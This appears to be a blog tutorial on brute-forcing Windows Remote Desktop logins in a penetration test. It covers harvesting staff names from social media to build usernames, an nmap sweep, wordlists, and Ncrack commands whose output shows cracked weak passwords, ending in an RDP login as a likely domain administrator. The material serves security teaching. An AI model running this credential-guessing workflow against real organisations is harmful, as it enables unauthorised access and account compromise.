The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding.
From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on various social networking websites. Those are the key IT staff:
jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine
Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine
If you are on backtrack 5 or backtrack 5 R1 than there is no need to install Ncrack because it is available by default but for other Linux distribution like Ubuntu you need to install it.
Information gathering
Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan.
Nmap ping scan, go no further than determining if host is online nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt
|
Nmap scan report for 192.168.56.10 |
Host is up (0.0017s latency). |
Not shown: 91 closed ports |
445/tcp open microsoft-ds |
1026/tcp open LSA-or-nterm |
3389/tcp open ms-term-serv |
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) |
Nmap scan report for 192.168.56.101 |
Host is up (0.014s latency). |
Not shown: 96 closed ports |
445/tcp open microsoft-ds |
3389/tcp open ms-term-serv |
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) |
Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds
|
From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.
At this point we need to create a file (my.usr) with the probable usernames previously gathered.vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine. ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 |
Discovered credentials for rdp on 192.168.56.10 3389/tcp: |
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' |
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' |
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' |
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' |
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' |
Ncrack done: 1 service scanned in 98.00 seconds. |
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 |
We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.
Run the terminal server client from the Linux box
tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places. 
